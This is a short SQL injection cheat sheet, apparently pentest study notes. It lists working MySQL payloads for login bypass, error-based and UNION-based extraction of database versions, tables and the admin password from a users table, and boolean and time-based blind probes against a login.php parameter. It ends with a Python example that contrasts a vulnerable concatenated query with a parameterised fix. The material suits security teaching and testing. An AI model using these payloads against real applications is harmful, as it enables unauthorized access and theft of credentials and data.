💉 SQL Injection

Try the SecLists SQL injection wordlist and use Burp Suite Intruder to test it against the parameter.

Basic payload to test:

'OR '' = '

Error-Based Payloads

Sometimes SQL injection can lead to authentication bypass.

Something like the following can be used. Try switching between ' and " to match the quoting used in the query. Note that the payloads below (@@version, database(), user(), sleep()) are MySQL/MariaDB syntax.

whatever' OR 1=1 -- //

To enumerate the database version with error-based SQLi:

' or 1=1 in (select @@version) -- //

We can directly enumerate the database if the output is reflected back:

' OR 1=1 in (SELECT * FROM users) -- //

If that errors (a subquery used with IN must return a single column), try the columns one by one:

' or 1=1 in (SELECT password FROM users) -- //

To get the password of a specific user:

' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

UNION-based Payloads

We can find the number of columns in the original query with ORDER BY:

' ORDER BY 1-- //

Then, to run a UNION query (the number of selected columns must match the original query):

%' UNION SELECT database(), user(), @@version, null, null -- //

Now we can list the tables and columns of the current database via information_schema:

' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //

Blind SQLi

Blind SQLi occurs when the application returns no database output or error messages. In this case we can use boolean-based or time-based logic.

To try boolean-based SQLi:

http://<ip>/login.php?user=admin' AND 1=1 -- //

Both conditions must hold for the query to match, so if the application responds as it would for a valid login we can conclude that admin exists in the database.

To try time-based SQLi:

http://<ip>/login.php?user=admin' AND IF (1=1, sleep(3),'false') -- //

This will delay the response by 3 seconds if the user is present.
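As an added illustration (not part of the original notes), the following constructed login routine shows why the auth-bypass and boolean payloads above work and what the fix looks like: a vulnerable string-concatenated query beside its parameterised counterpart, backed by an in-memory SQLite `users` table (SQLite stands in for MySQL here; the table and column names follow the payloads above).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database standing in for the app behind login.php:
    a 'users' table with username/password columns, as the payloads assume."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """String concatenation: user input becomes part of the SQL grammar.
    A quote in the input closes the literal, and '-- ' comments out the
    rest of the WHERE clause, so the password check never runs."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterised query: input is bound as data and never parsed as SQL,
    so the same payloads are simply compared literally against the columns."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("whatever' OR 1=1 -- //", "x"),   # auth bypass
                     ("admin' AND 1=1 -- //", "x"),      # boolean probe, true
                     ("admin' AND 1=2 -- //", "x"),      # boolean probe, false
                     ("x", "' OR '' = '")]:              # basic payload in password
        print(repr(user), repr(pw), "vuln:", login_vulnerable(db, user, pw),
              "safe:", login_safe(db, user, pw))
```

The boolean probe pair illustrates the blind case: the vulnerable query answers differently for `AND 1=1` and `AND 1=2`, while the parameterised one returns nothing for either.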
